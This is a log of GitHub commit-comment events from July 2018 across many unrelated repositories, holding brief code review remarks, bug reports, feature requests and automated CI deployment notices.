{"id":"7961975393","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29699426,"position":6,"line":133,"path":"pom.xml","commit_id":"879942972e0ea0838edac8f9509bae46b50a274c","created_at":"2018-07-13T12:51:28Z","updated_at":"2018-07-13T12:51:28Z","author_association":"CONTRIBUTOR","body":"Any reason to use that repository instead of Central?\r\n\r\nAs a side note, excluding SNAPSHOT from a repository make it faster."}},"created_at":"2018-07-13T12:51:28Z"}
{"id":"7961977278","type":"CommitCommentEvent","actor":{"login":"bugok"},"repo":{"name":"bugok/dotfiles"},"payload":{"comment":{"id":29699432,"position":null,"line":null,"path":null,"commit_id":"18b283dfd910cda30e53fc0d5a5e1b6cd15f0d78","created_at":"2018-07-13T12:51:52Z","updated_at":"2018-07-13T12:51:52Z","author_association":"OWNER","body":"This was inspired (please read: stolen) from @orrsella's dotfiles repo:  https://github.com/orrsella/dotfiles"}},"created_at":"2018-07-13T12:51:52Z"}
{"id":"7961977779","type":"CommitCommentEvent","actor":{"login":"Middel"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29699436,"position":null,"line":null,"path":null,"commit_id":"a18d1474a3691f34b763925ff2cc922828394e42","created_at":"2018-07-13T12:51:58Z","updated_at":"2018-07-13T12:51:58Z","author_association":"NONE","body":"Working on Extracting DBC - MAPS - VMAPS and MMAPS. (will share once done)"}},"created_at":"2018-07-13T12:51:58Z"}
{"id":"7961983061","type":"CommitCommentEvent","actor":{"login":"caco3"},"repo":{"name":"Ryan-Myers/canon-selphy-print"},"payload":{"comment":{"id":29699448,"position":null,"line":null,"path":null,"commit_id":"c469bc2b4a2f0001a290cb4ff7cb9cd832244685","created_at":"2018-07-13T12:53:07Z","updated_at":"2018-07-13T12:53:07Z","author_association":"NONE","body":"@Ryan-Myers Can you have a look on my previous post?"}},"created_at":"2018-07-13T12:53:07Z"}
{"id":"7961984247","type":"CommitCommentEvent","actor":{"login":"twinters01"},"repo":{"name":"twinters01/rekt"},"payload":{"comment":{"id":29699450,"position":23,"line":23,"path":"app/views/users/editProfile.php","commit_id":"3f1f2f6c6c2888bd32a06bdf8200dcaf140c958c","created_at":"2018-07-13T12:53:21Z","updated_at":"2018-07-13T12:53:21Z","author_association":"OWNER","body":"Also, generally when you change your password on an online account, you have to enter your current password as an extra validation to make sure one more time that it's the right user."}},"created_at":"2018-07-13T12:53:21Z"}
{"id":"7961984748","type":"CommitCommentEvent","actor":{"login":"dgrove-oss"},"repo":{"name":"remore/openwhisk-runtime-ruby"},"payload":{"comment":{"id":29699452,"position":41,"line":41,"path":".travis.yml","commit_id":"1bef0b30121e03e9ac496682b895f41677443271","created_at":"2018-07-13T12:53:27Z","updated_at":"2018-07-13T12:53:27Z","author_association":"NONE","body":"yep.  once we get the apache repo, open an issue to enable the slackbot and assign it to me."}},"created_at":"2018-07-13T12:53:27Z"}
{"id":"7961988075","type":"CommitCommentEvent","actor":{"login":"CHTJonas"},"repo":{"name":"camdram/camdram"},"payload":{"comment":{"id":29699460,"position":4,"line":4,"path":"package.json","commit_id":"f9cfac4a1ad3ff144c31bafa88fa287c2f36e837","created_at":"2018-07-13T12:54:10Z","updated_at":"2018-07-13T12:54:10Z","author_association":"MEMBER","body":"Just checking - did you mean to link this to your fork rather than upstream? 😝 "}},"created_at":"2018-07-13T12:54:10Z"}
{"id":"7961988432","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29699461,"position":6,"line":133,"path":"pom.xml","commit_id":"879942972e0ea0838edac8f9509bae46b50a274c","created_at":"2018-07-13T12:54:13Z","updated_at":"2018-07-13T12:54:13Z","author_association":"CONTRIBUTOR","body":"@Sami32 Yes, it's to be able to test the plugin before I make a release to Central. We can't disable snapshots because the version of the plugin is currently a snapshot. This repository can be removed once we decide that the plugin is ready for release."}},"created_at":"2018-07-13T12:54:13Z"}
{"id":"7961991473","type":"CommitCommentEvent","actor":{"login":"victor-mendes-eduardo"},"repo":{"name":"jenkinsci/jira-steps-plugin"},"payload":{"comment":{"id":29699472,"position":null,"line":null,"path":null,"commit_id":"a2531aa43ed9e9cdd1ffda419a4df28584895b87","created_at":"2018-07-13T12:54:51Z","updated_at":"2018-07-13T12:54:51Z","author_association":"NONE","body":"Hi @nrayapati! \r\nI am having a little bit of problem when upgrading from 1.4.0 to 1.4.1. \r\nWhen uploading an attachment the full file path is being sent as the file name instead of the real file name. This is adding a little odd behavior as the upload is successfully done and showed at the Jira Issue screen but the download fails.\r\n\r\nI'm attaching a few screenshots to clear what's happening. Is there a better place to report this or can I make a pull request fixing this issue?\r\n\r\n![screenshot1](https://user-images.githubusercontent.com/379934/42692602-9ae15ef0-8682-11e8-8bc3-8c6cc6774493.png)\r\n![screenshot2](https://user-images.githubusercontent.com/379934/42692603-9b095e14-8682-11e8-9470-0583df2d640f.png)\r\n\r\nregards! "}},"created_at":"2018-07-13T12:54:51Z"}
{"id":"7961992796","type":"CommitCommentEvent","actor":{"login":"epixa"},"repo":{"name":"elastic/kibana"},"payload":{"comment":{"id":29699474,"position":null,"line":null,"path":null,"commit_id":"99f12e800571473062eecb03f745d9d5a3dfa59a","created_at":"2018-07-13T12:55:09Z","updated_at":"2018-07-13T12:55:09Z","author_association":"MEMBER","body":"This is great, thanks"}},"created_at":"2018-07-13T12:55:09Z"}
{"id":"7961994033","type":"CommitCommentEvent","actor":{"login":"MatiasComercio"},"repo":{"name":"CoNexDat/complexnets"},"payload":{"comment":{"id":29699477,"position":2,"line":1,"path":"CMakeLists.txt","commit_id":"a6013b9ff73a6bf6755212cdc1c8825ec1eb338e","created_at":"2018-07-13T12:55:22Z","updated_at":"2018-07-13T12:55:22Z","author_association":"CONTRIBUTOR","body":"I cannot remember it right now... What I'm sure about is that `3.1` this is the minimum required version for Qt stuff to easily work OK with CMake. Also, note that the old `test/CMakeLists.txt` file required version `3.2`, so using `3.1` is indeed safer than `3.10`. Are you having any problems with this version?"}},"created_at":"2018-07-13T12:55:22Z"}
{"id":"7961994089","type":"CommitCommentEvent","actor":{"login":"aletschhorn"},"repo":{"name":"fmtlib/fmt"},"payload":{"comment":{"id":29699478,"position":null,"line":null,"path":null,"commit_id":"0eb01b832c095c9a9e87d58adb5ed73b987c437e","created_at":"2018-07-13T12:55:23Z","updated_at":"2018-07-13T12:55:23Z","author_association":"NONE","body":"This does not work with MSVC 2017 native cmake support, see: https://github.com/fmtlib/fmt/issues/809 "}},"created_at":"2018-07-13T12:55:23Z"}
{"id":"7962000729","type":"CommitCommentEvent","actor":{"login":"hoyes"},"repo":{"name":"camdram/camdram"},"payload":{"comment":{"id":29699494,"position":4,"line":4,"path":"package.json","commit_id":"f9cfac4a1ad3ff144c31bafa88fa287c2f36e837","created_at":"2018-07-13T12:56:44Z","updated_at":"2018-07-13T12:56:44Z","author_association":"CONTRIBUTOR","body":"!!! oops... fixing"}},"created_at":"2018-07-13T12:56:44Z"}
{"id":"7962000777","type":"CommitCommentEvent","actor":{"login":"billchenchina"},"repo":{"name":"Ir1d/OI-wiki"},"payload":{"comment":{"id":29699495,"position":null,"line":null,"path":null,"commit_id":"d93f1c0cbccb2ee15756f94afa2316f2779f6fdf","created_at":"2018-07-13T12:56:45Z","updated_at":"2018-07-13T12:56:45Z","author_association":"NONE","body":"这 git diff 有点醉😂"}},"created_at":"2018-07-13T12:56:45Z"}
{"id":"7962001603","type":"CommitCommentEvent","actor":{"login":"Shnupbups"},"repo":{"name":"Shnupbups/TinkersAether"},"payload":{"comment":{"id":29699501,"position":null,"line":null,"path":null,"commit_id":"8630c13fb0517fb9ca44e4d77ecae914387b3462","created_at":"2018-07-13T12:56:56Z","updated_at":"2018-07-13T12:56:56Z","author_association":"OWNER","body":"Commit should be called v1.1.4, not v1.0.4. Whoops!"}},"created_at":"2018-07-13T12:56:56Z"}
{"id":"7962003598","type":"CommitCommentEvent","actor":{"login":"bparees"},"repo":{"name":"jboss-fuse/application-templates"},"payload":{"comment":{"id":29699507,"position":18,"line":37,"path":"fis-image-streams.json","commit_id":"400bea1de0fd576e5ab4f256f2c314268a1c0a0c","created_at":"2018-07-13T12:57:20Z","updated_at":"2018-07-13T12:57:20Z","author_association":"NONE","body":"the right way to accomplish that goal is to mark the tag as hidden (which should largely prevent users from accidentally stumbling upon them and using them).  But since these are already marked hidden i guess that's moot.\r\n"}},"created_at":"2018-07-13T12:57:20Z"}
{"id":"7962005780","type":"CommitCommentEvent","actor":{"login":"l2dy"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29699511,"position":null,"line":null,"path":null,"commit_id":"b73103922c68469183e21080b97de3edbf6335fa","created_at":"2018-07-13T12:57:46Z","updated_at":"2018-07-13T12:57:46Z","author_association":"MEMBER","body":"Closes https://trac.macports.org/ticket/50121?"}},"created_at":"2018-07-13T12:57:46Z"}
{"id":"7962009624","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29699523,"position":null,"line":null,"path":null,"commit_id":"d3d8aaf344274bcc5ce2d71e2103b8ab5c888bf8","created_at":"2018-07-13T12:58:32Z","updated_at":"2018-07-13T12:58:32Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-13T12:58:32Z"}
{"id":"7962011366","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29699527,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-13T12:58:52Z","updated_at":"2018-07-13T12:58:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T12:58:52Z"}
{"id":"7962012721","type":"CommitCommentEvent","actor":{"login":"SimonVrouwe"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29699534,"position":null,"line":null,"path":null,"commit_id":"fe405f49beba3686d324aae0e46ec61e77e9621c","created_at":"2018-07-13T12:59:10Z","updated_at":"2018-07-13T12:59:10Z","author_association":"NONE","body":"Ok I will give it a shot. But the `pow()` function needs `#include <math.h>` is that ok?"}},"created_at":"2018-07-13T12:59:10Z"}
{"id":"7962018923","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29699546,"position":null,"line":null,"path":null,"commit_id":"85285fd55ae448dc2f4206795ef3b74df6336ff6","created_at":"2018-07-13T13:00:24Z","updated_at":"2018-07-13T13:00:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-130022 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-130022\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T13:00:24Z"}
{"id":"7962019405","type":"CommitCommentEvent","actor":{"login":"astefanutti"},"repo":{"name":"jboss-fuse/application-templates"},"payload":{"comment":{"id":29699547,"position":18,"line":37,"path":"fis-image-streams.json","commit_id":"400bea1de0fd576e5ab4f256f2c314268a1c0a0c","created_at":"2018-07-13T13:00:29Z","updated_at":"2018-07-13T13:00:29Z","author_association":"CONTRIBUTOR","body":"Indeed, I agree having the image streams hidden is enough to achieve this goal, as we keep the visible templates / quickstarts up-to-date. Thanks again and sorry for the noise."}},"created_at":"2018-07-13T13:00:29Z"}
{"id":"7962022421","type":"CommitCommentEvent","actor":{"login":"lbschenkel"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29699554,"position":null,"line":null,"path":null,"commit_id":"b73103922c68469183e21080b97de3edbf6335fa","created_at":"2018-07-13T13:01:03Z","updated_at":"2018-07-13T13:01:03Z","author_association":"MEMBER","body":"Oh, I missed that ticket. I authored this port and have been running it for a while and today I decided to finally submit it."}},"created_at":"2018-07-13T13:01:03Z"}
{"id":"7962023901","type":"CommitCommentEvent","actor":{"login":"matthijskooijman"},"repo":{"name":"3devo/optiboot"},"payload":{"comment":{"id":29699555,"position":9,"line":234,"path":"optiboot/bootloaders/optiboot/optiboot.c","commit_id":"018e34911310e8455c364049d9384a4c22012e51","created_at":"2018-07-13T13:01:20Z","updated_at":"2018-07-13T13:01:20Z","author_association":"COLLABORATOR","body":"I would put this change in the \"Bump \"OPTIBOOT_CUSTOMVER\" for custom Devoboard version builds\" commit."}},"created_at":"2018-07-13T13:01:20Z"}
{"id":"7962025295","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29699558,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-13T13:01:37Z","updated_at":"2018-07-13T13:01:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T13:01:37Z"}
{"id":"7962032550","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29699579,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T13:03:05Z","updated_at":"2018-07-13T13:03:05Z","author_association":"OWNER","body":"I cannot use Bob's password. If Alice calls the claimBack function with Bob's password (and Carol's address) then Carol might see bob´s password in the blockchain and create a competing transaction."}},"created_at":"2018-07-13T13:03:05Z"}
{"id":"7962035969","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29699586,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-13T13:03:46Z","updated_at":"2018-07-13T13:03:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T13:03:46Z"}
{"id":"7962036002","type":"CommitCommentEvent","actor":{"login":"matthijskooijman"},"repo":{"name":"3devo/optiboot"},"payload":{"comment":{"id":29699587,"position":8,"line":582,"path":"optiboot/bootloaders/optiboot/optiboot.c","commit_id":"5f0418809baa44430121ea5b3a1eb500e05a18a9","created_at":"2018-07-13T13:03:46Z","updated_at":"2018-07-13T13:03:46Z","author_association":"COLLABORATOR","body":"Here are unrelated whitespace changes/fixes, which are probably best left out completely."}},"created_at":"2018-07-13T13:03:46Z"}
{"id":"7962040225","type":"CommitCommentEvent","actor":{"login":"wyhtc"},"repo":{"name":"emoacht/Monitorian"},"payload":{"comment":{"id":29699596,"position":null,"line":null,"path":null,"commit_id":"7b2f05e68017bc24b7c2f79ce98187fc5a1ef11b","created_at":"2018-07-13T13:04:38Z","updated_at":"2018-07-13T13:04:38Z","author_association":"NONE","body":"Hi emoacht ，Thank you for developing this tools. Could you please add keyboard hot key setting in newer versions？\r\n\r\nBest Regard"}},"created_at":"2018-07-13T13:04:38Z"}
{"id":"7962044548","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29699610,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T13:05:35Z","updated_at":"2018-07-13T13:05:35Z","author_association":"NONE","body":"True. I thought you had implemented a deadline mechanism.\r\nWhat if you had the deadline mechanism?"}},"created_at":"2018-07-13T13:05:35Z"}
{"id":"7962044965","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29699613,"position":null,"line":null,"path":null,"commit_id":"db0c0cb88b0ce1bc46c2de7e3f7cd18edac821e5","created_at":"2018-07-13T13:05:40Z","updated_at":"2018-07-13T13:05:40Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-130538 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-130538\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T13:05:40Z"}
{"id":"7962051142","type":"CommitCommentEvent","actor":{"login":"Vitaliy-1"},"repo":{"name":"Vitaliy-1/pkp-lib"},"payload":{"comment":{"id":29699628,"position":4,"line":112,"path":"locale/en_US/user.xml","commit_id":"36363e57ed26f74623cd7062304406bf683b5dfc","created_at":"2018-07-13T13:06:58Z","updated_at":"2018-07-13T13:06:58Z","author_association":"OWNER","body":"As I think, it will require some changes in the `RegistrationForm` class. Right now it checks whether variable `privacyConsent` has a value, but if display a consent statement for every journal, the check for every input would be required (not only one). Basically, can I use this simplified approach for the Classic theme while the solution for this issue is not found?"}},"created_at":"2018-07-13T13:06:58Z"}
{"id":"7962056480","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29699639,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T13:08:03Z","updated_at":"2018-07-13T13:08:03Z","author_association":"OWNER","body":"Adding Alice's address to the Keccak256 function I guess. Then the claimBack function would receive Bob's password and Carol's address and implicitly Alice's address..."}},"created_at":"2018-07-13T13:08:03Z"}
{"id":"7962066342","type":"CommitCommentEvent","actor":{"login":"Rumidom"},"repo":{"name":"reyalpsirc/react-native"},"payload":{"comment":{"id":29699664,"position":null,"line":null,"path":null,"commit_id":"6b1831e6cd5b6a98c56a12e8566cb5c2a9b90df2","created_at":"2018-07-13T13:09:56Z","updated_at":"2018-07-13T13:09:56Z","author_association":"NONE","body":"using this fix gives me another error: 'blob has been closed and is no longer available'"}},"created_at":"2018-07-13T13:09:56Z"}
{"id":"7962069864","type":"CommitCommentEvent","actor":{"login":"mikkelfj"},"repo":{"name":"quicwg/base-drafts"},"payload":{"comment":{"id":29699670,"position":16,"line":1748,"path":"draft-ietf-quic-transport.md","commit_id":"03ddb3ecc0a84c4c16d379262363b00f72d7335e","created_at":"2018-07-13T13:10:38Z","updated_at":"2018-07-13T13:10:38Z","author_association":"NONE","body":"comaparisions ?"}},"created_at":"2018-07-13T13:10:38Z"}
{"id":"7962070417","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/platypus-nf"},"payload":{"comment":{"id":29699671,"position":null,"line":null,"path":null,"commit_id":"25cf3729ea00d2ab99cb9d467b07431965a3987a","created_at":"2018-07-13T13:10:44Z","updated_at":"2018-07-13T13:10:44Z","author_association":"MEMBER","body":"fixes #17 "}},"created_at":"2018-07-13T13:10:44Z"}
{"id":"7962072662","type":"CommitCommentEvent","actor":{"login":"bigsinger"},"repo":{"name":"bigsinger/AndroidIdChanger"},"payload":{"comment":{"id":29699674,"position":null,"line":null,"path":null,"commit_id":"aa993d8ba58863e1d922efcd609943a462626bf2","created_at":"2018-07-13T13:11:12Z","updated_at":"2018-07-13T13:11:12Z","author_association":"OWNER","body":"国外的情况呢？我也要考虑海外用户。"}},"created_at":"2018-07-13T13:11:12Z"}
{"id":"7962074881","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29699678,"position":null,"line":null,"path":null,"commit_id":"378755ca695682d54f9719670727aaef01d852f3","created_at":"2018-07-13T13:11:38Z","updated_at":"2018-07-13T13:11:38Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-378755ca695682d54f9719670727aaef01d852f3-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-378755ca695682d54f9719670727aaef01d852f3-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T13:11:38Z"}
{"id":"7962077161","type":"CommitCommentEvent","actor":{"login":"Ryan-Myers"},"repo":{"name":"Ryan-Myers/canon-selphy-print"},"payload":{"comment":{"id":29699680,"position":null,"line":null,"path":null,"commit_id":"c469bc2b4a2f0001a290cb4ff7cb9cd832244685","created_at":"2018-07-13T13:12:07Z","updated_at":"2018-07-13T13:12:07Z","author_association":"OWNER","body":"Sorry, it's been a hectic little bit due to my wedding and honeymoon. I Have some rough instructions on how I compiled the drivers here: https://github.com/Ryan-Myers/Photobooth/blob/master/instructions.txt  \r\n\r\nHowever, I also have pre-compiled and uploaded the drivers here as well: https://github.com/Ryan-Myers/Photobooth/raw/master/stp-canon-cp1300.5.3.ppd.gz\r\n\r\nI haven't tested the pre-compiled drivers on a system that didn't already go through the process of compiling everything though, so I don't know if it will just work as a plug and play thing. I found that the drivers were added to the following folder: /usr/share/cups/model/C/stp-canon-cp1300.5.3.ppd.gz on my system. After they were installed, I would just go to the CUPS configuration and manually select my driver."}},"created_at":"2018-07-13T13:12:07Z"}
{"id":"7962079832","type":"CommitCommentEvent","actor":{"login":"NeRd7733"},"repo":{"name":"RevivalPMMP/PEXProtection"},"payload":{"comment":{"id":29699686,"position":4,"line":3,"path":"plugin.yml","commit_id":"69d8bad59ba4443a43ccfc05590cac6bbd60fbb0","created_at":"2018-07-13T13:12:39Z","updated_at":"2018-07-13T13:12:39Z","author_association":"NONE","body":"+api: [3.0.0-ALPHA12, 4.0.0-ALPHA12]"}},"created_at":"2018-07-13T13:12:39Z"}
{"id":"7962081034","type":"CommitCommentEvent","actor":{"login":"danilags"},"repo":{"name":"snipsco/react-inview-monitor"},"payload":{"comment":{"id":29699690,"position":null,"line":null,"path":null,"commit_id":"60a657d9aabcd35d20cbee169c62274133612634","created_at":"2018-07-13T13:12:54Z","updated_at":"2018-07-13T13:12:54Z","author_association":"NONE","body":"Sure! Kindly check on this url testing http://develop-web.ap-southeast-1.elasticbeanstalk.com/\r\nThanks."}},"created_at":"2018-07-13T13:12:54Z"}
{"id":"7962081508","type":"CommitCommentEvent","actor":{"login":"TjWallas"},"repo":{"name":"TjWallas/dynamic-netsec"},"payload":{"comment":{"id":29699691,"position":5,"line":47,"path":"Vagrantfile","commit_id":"dd6454304d8322b5c13f8e7a17cc34b81945f95f","created_at":"2018-07-13T13:12:59Z","updated_at":"2018-07-13T13:12:59Z","author_association":"OWNER","body":"@xiecancn Please bring this line back. We need to provision the machines if they will be started from scratch using `vagrant up`."}},"created_at":"2018-07-13T13:12:59Z"}
{"id":"7962083493","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29699694,"position":6,"line":133,"path":"pom.xml","commit_id":"879942972e0ea0838edac8f9509bae46b50a274c","created_at":"2018-07-13T13:13:24Z","updated_at":"2018-07-13T13:13:24Z","author_association":"CONTRIBUTOR","body":"Good, i was afraid that it was the final status."}},"created_at":"2018-07-13T13:13:24Z"}
{"id":"7962084735","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29699696,"position":null,"line":null,"path":null,"commit_id":"3161334ca6f6642e0d0a32f7397a868a49fe4462","created_at":"2018-07-13T13:13:39Z","updated_at":"2018-07-13T13:13:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-131339 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-131339\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T13:13:39Z"}
{"id":"7962085007","type":"CommitCommentEvent","actor":{"login":"forax"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29699697,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-13T13:13:43Z","updated_at":"2018-07-13T13:13:43Z","author_association":"OWNER","body":"because it seems that selectModule() was shallowing the error message (a LinkageError directly throws by the VM)"}},"created_at":"2018-07-13T13:13:43Z"}
{"id":"7962086548","type":"CommitCommentEvent","actor":{"login":"TjWallas"},"repo":{"name":"TjWallas/dynamic-netsec"},"payload":{"comment":{"id":29699705,"position":3,"line":3,"path":"vagrant/setup-ovs.sh","commit_id":"dd6454304d8322b5c13f8e7a17cc34b81945f95f","created_at":"2018-07-13T13:14:02Z","updated_at":"2018-07-13T13:14:02Z","author_association":"OWNER","body":"Please rename this and use descriptive choices. I'd suggest `MASTER_NET_STATISTICS_COLLECTOR`"}},"created_at":"2018-07-13T13:14:02Z"}
